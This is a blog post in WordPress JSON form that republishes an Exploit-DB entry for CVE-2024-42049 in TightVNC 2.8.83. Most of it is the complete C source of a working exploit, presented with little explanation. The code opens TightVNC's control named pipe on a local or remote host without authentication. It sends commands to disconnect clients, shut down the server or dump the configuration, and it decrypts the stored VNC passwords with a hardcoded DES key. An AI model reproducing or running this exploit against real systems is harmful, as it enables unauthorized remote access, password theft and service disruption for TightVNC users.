{"id":6751,"date":"2025-06-11T09:38:57","date_gmt":"2025-06-11T09:38:57","guid":{"rendered":"http:\/\/localhost\/?p=6751"},"modified":"2025-06-11T09:38:57","modified_gmt":"2025-06-11T09:38:57","slug":"tightvnc-2883-control-pipe-manipulation","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=6751","title":{"rendered":"TightVNC 2.8.83 &#8211; Control Pipe Manipulation"},"content":{"rendered":"<h2>Exploit Details<\/h2>\n<h3>Basic Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit Title<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">TightVNC 2.8.83 &#8211; Control Pipe Manipulation<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit ID<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">EDB-ID:52322<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Type<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">exploitdb<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Published<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-06-09T00:00:00<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Modified<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-06-09T00:00:00<\/td>\n<\/tr>\n<\/table>\n<h3>CVSS Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">CVSS Score<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">9.1<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Severity<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd; color: #cc0000; font-weight: bold;\">CRITICAL<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Vector<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:N<\/td>\n<\/tr>\n<\/table>\n<h3>CVE Information<\/h3>\n<div style=\" padding: 15px; border: 1px solid #ddd; margin-bottom: 20px;\">\n<ul style=\"margin: 0; padding-left: 20px;\">\n<li>CVE-2024-42049<\/li>\n<\/ul>\n<\/div>\n<h3>Exploit Description<\/h3>\n<div style=\" padding: 15px; border-left: 4px solid #4CAF50; margin-bottom: 20px;\">\nExploit Title: TightVNC 2.8.83 &#8211; Control&#8230;\n<\/div>\n<h3>Exploit Code<\/h3>\n<div style=\" color: #d4d4d4; padding: 15px; border: 1px solid #ddd; margin-bottom: 20px; font-family: 'Courier New', monospace; white-space: pre-wrap; overflow-x: auto;\">\n# Exploit Title: TightVNC 2.8.83 &#8211; Control Pipe Manipulation<br \/>\n<br \/># Date: 06\/09\/2025<br \/>\n<br \/># Exploit Author: Ionut Zevedei (mail@izvd.eu)<br \/>\n<br \/># Exploit Repository: https:\/\/github.com\/zeved\/CVE-2024-42049-PoC<br \/>\n<br \/># Vendor Homepage: https:\/\/www.tightvnc.com\/<br \/>\n<br \/># Software Link: https:\/\/www.tightvnc.com\/download.php<br \/>\n<br \/># Version: 2.8.83<br \/>\n<br \/># Tested on: Windows 10 x64 &#8211; TightVNC 2.5.10, 2.8.81<br \/>\n<br \/># CVE : CVE-2024-42049<\/p>\n<p>#include <windows.h>=20<br \/>\n<br \/>#include <stdio.h><br \/>\n<br \/>#include <conio.h><br \/>\n<br \/>#include <tchar.h><br \/>\n<br \/>#include &#8220;descrypt.h&#8221;<\/p>\n<p>#define GETBYTE(x, n) (((x) >> ((n) * 8)) &#038; 0xFF)<br \/>\n<br \/>#define BUFFER_SIZE 512<\/p>\n<p>#define TVNC_CMD_DISCONNECT_ALL_CLIENTS 0x06<br \/>\n<br \/>#define TVNC_CMD_GET_CLIENT_LIST        0x04<br \/>\n<br \/>#define TVNC_CMD_SHUTDOWN_SERVER        0x07<br \/>\n<br \/>#define TVNC_CMD_GET_SERVER_INFO        0x11<br \/>\n<br \/>#define TVNC_CMD_GET_CONFIG             0x12<\/p>\n<p>const unsigned int commands[6] =3D {<br \/>\n<br \/>  TVNC_CMD_DISCONNECT_ALL_CLIENTS,<br \/>\n<br \/>  TVNC_CMD_GET_CLIENT_LIST,<br \/>\n<br \/>  TVNC_CMD_SHUTDOWN_SERVER,<br \/>\n<br \/>  TVNC_CMD_GET_SERVER_INFO,<br \/>\n<br \/>  TVNC_CMD_GET_CONFIG,<br \/>\n<br \/>};<\/p>\n<p>unsigned char des_key[8] =3D { 23, 82, 107, 6, 35, 78, 88, 7 };<\/p>\n<p>void get_bytes(unsigned int data, unsigned char* out) {<br \/>\n<br \/>  out[0] =3D GETBYTE(data, 3);<br \/>\n<br \/>  out[1] =3D GETBYTE(data, 2);<br \/>\n<br \/>  out[2] =3D GETBYTE(data, 1);<br \/>\n<br \/>  out[3] =3D GETBYTE(data, 0);<br \/>\n<br \/>}<\/p>\n<p>\/\/ printf is wonky when printing passwords later<br \/>\n<br \/>void print_passwd(unsigned char* passwd) {<br \/>\n<br \/>  for (int i =3D 0; i < 8; i++) {\n<br \/>    printf(&#8220;%c&#8221;, passwd[i]);<br \/>\n<br \/>  }<br \/>\n<br \/>  printf(&#8220;\\n&#8221;);<br \/>\n<br \/>}<\/p>\n<p>void print_error(unsigned long error_code) {<br \/>\n<br \/>  unsigned char* buffer;<br \/>\n<br \/> =20<br \/>\n<br \/>  \/\/ damn it windows&#8230;<br \/>\n<br \/>  FormatMessage(<br \/>\n<br \/>    FORMAT_MESSAGE_ALLOCATE_BUFFER |<br \/>\n<br \/>    FORMAT_MESSAGE_FROM_SYSTEM |<br \/>\n<br \/>    FORMAT_MESSAGE_IGNORE_INSERTS,<br \/>\n<br \/>    NULL,<br \/>\n<br \/>    error_code,<br \/>\n<br \/>    MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),<br \/>\n<br \/>    (LPTSTR) &#038;buffer,<br \/>\n<br \/>    0, NULL);<\/p>\n<p>  printf(&#8220;[error]: %s\\n&#8221;, buffer);<br \/>\n<br \/>}<\/p>\n<p>void decrypt_passwords(unsigned char *buffer_ptr, unsigned int offset) {<br \/>\n<br \/>  unsigned char primary_passwd[8] =3D { 0x00 };<br \/>\n<br \/>  unsigned char view_only_passwd[8] =3D { 0x00 };<\/p>\n<p>  printf(&#8220;\\n\\tencrypted primary password: &#8220;);<br \/>\n<br \/>  for (int i =3D 0; i < 8; i++) {\n<br \/>    primary_passwd[i] =3D buffer_ptr[offset + 8 + i];<br \/>\n<br \/>    printf(&#8220;%02x &#8220;, primary_passwd[i]);<br \/>\n<br \/>  }<br \/>\n<br \/>  printf(&#8220;\\n\\tencrypted view-only password: &#8220;);<br \/>\n<br \/>  for (int i =3D 0; i < 8; i++) {\n<br \/>    view_only_passwd[i] =3D buffer_ptr[offset + i];<br \/>\n<br \/>    printf(&#8220;%02x &#8220;, view_only_passwd[i]);<br \/>\n<br \/>  }<\/p>\n<p>  unsigned char primary_passwd_decrypted[8] =3D { 0x00 };<br \/>\n<br \/>  unsigned char view_only_passwd_decrypted[8] =3D { 0x00 };<\/p>\n<p>  decrypt(primary_passwd_decrypted, view_only_passwd,<br \/>\n<br \/>    sizeof(primary_passwd_decrypted), des_key);<br \/>\n<br \/>  decrypt(view_only_passwd_decrypted, primary_passwd,<br \/>\n<br \/>    sizeof(view_only_passwd_decrypted), des_key);<\/p>\n<p>  printf(&#8220;\\n\\tdecrypted primary password: &#8220;);<br \/>\n<br \/>  print_passwd(primary_passwd_decrypted);<br \/>\n<br \/>  printf(&#8220;\\tdecrypted view-only password: &#8220;);<br \/>\n<br \/>  print_passwd(view_only_passwd_decrypted);<br \/>\n<br \/>}<\/p>\n<p>BOOL open_pipe(PHANDLE handle_ptr, char *pipe_name) {<br \/>\n<br \/>  unsigned long pipe_mode;<br \/>\n<br \/>  BOOL result =3D FALSE;<br \/>\n<br \/>  printf(&#8220;[~] opening pipe %s&#8230;\\n&#8221;, pipe_name);<\/p>\n<p>  while (1) {<br \/>\n<br \/>    *handle_ptr =3D CreateFile(<br \/>\n<br \/>      pipe_name,<br \/>\n<br \/>      GENERIC_READ | GENERIC_WRITE,<br \/>\n<br \/>      0,<br \/>\n<br \/>      NULL,<br \/>\n<br \/>      OPEN_EXISTING,<br \/>\n<br \/>      FILE_FLAG_OVERLAPPED,<br \/>\n<br \/>      NULL<br \/>\n<br \/>    );<\/p>\n<p>    if (*handle_ptr !=3D INVALID_HANDLE_VALUE) {<br \/>\n<br \/>      printf(&#8220;[+] pipe opened\\n&#8221;);<br \/>\n<br \/>      break;<br \/>\n<br \/>    }<\/p>\n<p>    if (GetLastError() !=3D ERROR_PIPE_BUSY) {<br \/>\n<br \/>      printf(&#8220;[-] could not open pipe\\n&#8221;);<br \/>\n<br \/>      print_error(GetLastError());<br \/>\n<br \/>      return FALSE;<br \/>\n<br \/>    }<\/p>\n<p>    printf(&#8220;[~] waiting for named pipe to be available &#8211; if this hangs the =<br \/>\n<br \/>pipe server might be dead.\\n&#8221;);<\/p>\n<p>    WaitNamedPipe(pipe_name, NMPWAIT_WAIT_FOREVER);<br \/>\n<br \/>  }<\/p>\n<p>  pipe_mode =3D PIPE_READMODE_BYTE;<br \/>\n<br \/>  result =3D SetNamedPipeHandleState(*handle_ptr, &#038;pipe_mode, NULL, NULL);<\/p>\n<p>  if (!result) {<br \/>\n<br \/>    printf(&#8220;[-] failed setting pipe read mode\\n&#8221;);<br \/>\n<br \/>    print_error(GetLastError());<br \/>\n<br \/>    return result;<br \/>\n<br \/>  }<\/p>\n<p>  return result;<br \/>\n<br \/>}<\/p>\n<p>int main(int argc, char* argv[]) {<\/p>\n<p>  HANDLE        pipe_handle =3D NULL;<br \/>\n<br \/>  unsigned char message[8] =3D { 0x00 };<br \/>\n<br \/>  unsigned char buffer[BUFFER_SIZE] =3D { 0x00 };<br \/>\n<br \/>  BOOL          result =3D FALSE;<br \/>\n<br \/>  unsigned long bytes_read, bytes_written;<br \/>\n<br \/>  unsigned int  cmd_index =3D 0;<br \/>\n<br \/>  unsigned int  offset =3D 30;<\/p>\n<p>  if (argc < 3) {\n<br \/>    printf(&#8220;usage: %s <command> <pipe> <offset?>\\n&#8221;, argv[0]);<br \/>\n<br \/>    printf(&#8220;offset &#8211; optional: default is 30 &#8211; change as needed\\n&#8221;);<br \/>\n<br \/>    printf(&#8220;commands:\\n&#8221;);<br \/>\n<br \/>    printf(&#8220;\\t1 &#8211; disconnect all clients\\n&#8221;);<br \/>\n<br \/>    printf(&#8220;\\t2 &#8211; get client list\\n&#8221;);<br \/>\n<br \/>    printf(&#8220;\\t3 &#8211; shutdown server\\n&#8221;);<br \/>\n<br \/>    printf(&#8220;\\t4 &#8211; get server info\\n&#8221;);<br \/>\n<br \/>    printf(&#8220;\\t5 &#8211; get server config\\n&#8221;);<br \/>\n<br \/>    printf(&#8220;example pipes:\\n\\t\\\\\\\\192.168.1.42\\\\pipe\\\\TightVNC_Service_Cont=<br \/>\n<br \/>rol\\n&#8221;);<br \/>\n<br \/>    printf(&#8220;\\t\\\\\\\\.\\\\pipe\\\\TightVNC_Application_Control_On_Session1\\n\\n&#8221;);<br \/>\n<br \/>    return 0;<br \/>\n<br \/>  }<\/p>\n<p>  char* stop =3D NULL;<br \/>\n<br \/>  cmd_index =3D strtol(argv[1], &#038;stop, 10);<\/p>\n<p>  if (stop =3D=3D &#8216;\\0&#8217;) {<br \/>\n<br \/>    return 0;<br \/>\n<br \/>  }<\/p>\n<p>  cmd_index&#8211;;<\/p>\n<p>  if (argc =3D=3D 4) {<br \/>\n<br \/>    stop =3D NULL;<br \/>\n<br \/>    offset =3D strtol(argv[3], &#038;stop, 10);<\/p>\n<p>    if (offset =3D=3D 0 || stop =3D=3D &#8216;\\0&#8217;) {<br \/>\n<br \/>      return 0;<br \/>\n<br \/>    }<br \/>\n<br \/>  }<\/p>\n<p>  if (!open_pipe(&#038;pipe_handle, argv[2])) {<br \/>\n<br \/>    goto exit;<br \/>\n<br \/>  }<\/p>\n<p>  printf(&#8220;[i] sending command&#8230;\\n&#8221;);<br \/>\n<br \/> =20<br \/>\n<br \/>  get_bytes(commands[cmd_index], message);<br \/>\n<br \/>  result =3D WriteFile(pipe_handle, message, 8, &#038;bytes_written, NULL);<\/p>\n<p>  if (!result) {<br \/>\n<br \/>    printf(&#8220;[-] failed writing to pipe\\n&#8221;);<br \/>\n<br \/>    print_error(GetLastError());<br \/>\n<br \/>    goto exit;<br \/>\n<br \/>  }<\/p>\n<p>  printf(&#8220;[~] message sent; waiting for reply\\n&#8221;);<\/p>\n<p>  do {<br \/>\n<br \/>    result =3D ReadFile(<br \/>\n<br \/>      pipe_handle,<br \/>\n<br \/>      buffer,<br \/>\n<br \/>      BUFFER_SIZE * sizeof(unsigned char),<br \/>\n<br \/>      &#038;bytes_read,<br \/>\n<br \/>      NULL<br \/>\n<br \/>    );<\/p>\n<p>    if (!result &#038;&#038; GetLastError() !=3D ERROR_MORE_DATA)<br \/>\n<br \/>      break;<\/p>\n<p>    printf(&#8220;[+] got %d bytes back!\\n&#8221;, bytes_read);<br \/>\n<br \/>    printf(&#8221;    hex: \\n\\t&#8221;);<\/p>\n<p>    for (int i =3D 0; i < bytes_read; i++) {\n<br \/>      printf(&#8220;%02x &#8220;, buffer[i]);<br \/>\n<br \/>    }<\/p>\n<p>    printf(&#8220;\\n    char: \\n\\t&#8221;);<br \/>\n<br \/>    for (int i =3D 0; i < bytes_read; i++) {\n<br \/>      printf(&#8220;%c&#8221;, buffer[i]);<br \/>\n<br \/>    }<br \/>\n<br \/>    printf(&#8220;\\n\\n&#8221;);<\/p>\n<p>    if (cmd_index =3D=3D 4) {<br \/>\n<br \/>      printf(&#8220;\\n[~] command is get config, attempting to decrypt passwords =<br \/>\n<br \/>using offset %d&#8230;\\n&#8221;, offset);<br \/>\n<br \/>      decrypt_passwords(&#038;buffer, offset);<br \/>\n<br \/>    }<\/p>\n<p>    memset(buffer, 0, BUFFER_SIZE);<br \/>\n<br \/>  } while (!result);<\/p>\n<p>  if (!result)<br \/>\n<br \/>  {<br \/>\n<br \/>    printf(&#8220;[-] failed reading from pipe\\n&#8221;);<br \/>\n<br \/>    print_error(GetLastError());<br \/>\n<br \/>    goto exit;<br \/>\n<br \/>  }<\/p>\n<p>  printf(&#8220;\\n[+] done\\n\\n&#8221;);<\/p>\n<p>exit:<br \/>\n<br \/>  if (pipe_handle !=3D NULL) {<br \/>\n<br \/>    CloseHandle(&#038;pipe_handle);<br \/>\n<br \/>  }<\/p>\n<p>  return 0;<br \/>\n<br \/>}\n<\/div>\n<p><a href=\"https:\/\/www.exploit-db.com\/exploits\/52322\" target=\"_blank\" style=\"display: inline-block;  color: white; padding: 10px 20px; text-decoration: none; border-radius: 4px;\">View Full Exploit Details<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Exploit Details Basic Information Exploit Title TightVNC 2.8.83 &#8211; Control Pipe Manipulation Exploit ID EDB-ID:52322 Type exploitdb Published 2025-06-09T00:00:00 Modified 2025-06-09T00:00:00 CVSS Information CVSS Score&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,10,12,40,13,7,11,5],"class_list":["post-6751","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-91","tag-exploit","tag-exploitdb","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>TightVNC 2.8.83 - Control Pipe Manipulation - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=6751\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"TightVNC 2.8.83 - Control Pipe Manipulation - zero redgem\" \/>\n<meta property=\"og:description\" content=\"Exploit Details Basic Information Exploit Title TightVNC 2.8.83 &#8211; Control Pipe Manipulation Exploit ID EDB-ID:52322 Type exploitdb Published 2025-06-09T00:00:00 Modified 2025-06-09T00:00:00 CVSS Information CVSS Score...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=6751\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-06-11T09:38:57+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6751#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6751\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"TightVNC 2.8.83 &#8211; Control Pipe Manipulation\",\"datePublished\":\"2025-06-11T09:38:57+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6751\"},\"wordCount\":888,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.1\",\"exploit\",\"exploitdb\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=6751#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6751\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6751\",\"name\":\"TightVNC 2.8.83 - Control Pipe Manipulation - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-06-11T09:38:57+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6751#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=6751\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6751#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"TightVNC 2.8.83 &#8211; Control Pipe Manipulation\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"TightVNC 2.8.83 - Control Pipe Manipulation - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=6751","og_locale":"en_US","og_type":"article","og_title":"TightVNC 2.8.83 - Control Pipe Manipulation - zero redgem","og_description":"Exploit Details Basic Information Exploit Title TightVNC 2.8.83 &#8211; Control Pipe Manipulation Exploit ID EDB-ID:52322 Type exploitdb Published 2025-06-09T00:00:00 Modified 2025-06-09T00:00:00 CVSS Information CVSS Score...","og_url":"https:\/\/zero.redgem.net\/?p=6751","og_site_name":"zero redgem","article_published_time":"2025-06-11T09:38:57+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=6751#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=6751"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"TightVNC 2.8.83 &#8211; Control Pipe Manipulation","datePublished":"2025-06-11T09:38:57+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=6751"},"wordCount":888,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.1","exploit","exploitdb","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=6751#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=6751","url":"https:\/\/zero.redgem.net\/?p=6751","name":"TightVNC 2.8.83 - Control Pipe Manipulation - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-06-11T09:38:57+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=6751#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=6751"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=6751#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"TightVNC 2.8.83 &#8211; Control Pipe Manipulation"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/6751","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6751"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/6751\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6751"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6751"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6751"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}